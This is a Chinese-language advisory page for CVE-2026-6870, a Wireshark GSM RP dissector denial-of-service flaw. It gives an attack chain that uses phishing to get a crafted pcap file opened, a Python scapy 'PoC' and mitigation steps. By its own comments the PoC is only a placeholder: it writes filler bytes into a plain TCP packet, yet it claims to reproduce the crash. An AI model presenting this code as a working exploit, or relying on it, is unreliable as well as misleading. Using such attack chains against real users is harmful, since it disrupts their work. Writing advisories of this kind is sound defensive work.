CVE-2026-6870 CVSS 5.5 中危

CVE-2026-6870 Wireshark GSM RP协议拒绝服务漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6870

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wireshark

漏洞概述

Wireshark 4.6.0至4.6.4及4.4.0至4.4.14版本中的GSM RP协议解析器存在拒绝服务漏洞。由于解析器未能正确处理畸形数据，攻击者可诱导用户打开包含恶意数据包的pcap文件，触发应用程序崩溃。该攻击需要本地环境及用户交互，成功利用将导致Wireshark服务不可用，影响正常的网络监控与分析工作。

技术细节

该漏洞根源在于Wireshark软件中集成的GSM RP（无线资源）协议解析器代码存在逻辑缺陷。在解析特定构造的畸形数据包时，解析器未能对数据包的长度字段或特定标记进行充分的合法性校验，导致在内存读取操作时发生越界访问或空指针引用。攻击者利用该漏洞前，需先制作包含恶意GSM RP协议数据的pcap文件，并通过钓鱼邮件等方式发送给目标用户。当受害者使用存在漏洞的Wireshark版本打开该文件时，解析器自动处理数据内容，触发异常并导致软件崩溃。尽管攻击向量被标记为本地且需要用户交互，无法直接远程利用，但该漏洞可被用于中断安全人员的网络分析工作，造成拒绝服务。目前没有证据表明该漏洞可导致代码执行或敏感数据泄露。

攻击链分析

STEP 1

1. 漏洞侦察

攻击者确认目标系统使用存在漏洞的Wireshark版本（4.4.0-4.4.14或4.6.0-4.6.4）。

STEP 2

2. 构造恶意数据

攻击者编写或使用工具生成包含特定畸形GSM RP协议字段的pcap数据包文件。

STEP 3

3. 诱导用户交互

通过钓鱼邮件或文件共享渠道，诱导受害者下载并使用Wireshark打开该恶意pcap文件。

STEP 4

4. 触发崩溃

Wireshark的GSM RP解析器处理畸形数据时发生异常，导致应用程序进程终止。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-6870: Wireshark GSM RP Dissector Crash
# This script generates a pcap file with a malformed packet.
# Opening this file in a vulnerable Wireshark version triggers the DoS.

from scapy.all import *
import sys

def generate_poc():
    # Construct a raw packet that simulates a malformed GSM RP structure
    # Real crash requires specific bytes derived from fuzzing or advisory.
    # This is a placeholder structure.
    
    # Example: Malformed GSM RP Message Type or Length
    # GSM RP PDUs are typically encapsulated in other protocols (e.g., TPDU).
    # We create a dummy TCP packet containing the payload.
    
    crash_payload = b"\x44" * 50  # Example payload bytes
    
    # Craft packet
    pkt = IP(dst="192.168.1.1")/TCP(sport=12345, dport=80)/Raw(load=crash_payload)
    
    # Save to pcap
    filename = "cve-2026-6870_poc.pcap"
    wrpcap(filename, pkt)
    print(f"[+] PoC file generated: {filename}")
    print("[*] Open this file in Wireshark (v4.4.0-4.4.14 or v4.6.0-4.6.4) to reproduce the crash.")

if __name__ == "__main__":
    generate_poc()

影响范围

Wireshark 4.6.0 to 4.6.4

Wireshark 4.4.0 to 4.4.14

防御指南

临时缓解措施

建议用户尽快升级到最新的修复版本。如果无法立即升级，可以在Wireshark的协议设置中暂时禁用GSM RP解析器（Edit -> Preferences -> Protocols -> GSM RP），以防止打开恶意文件时触发崩溃。同时，应避免打开来源不明的pcap文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表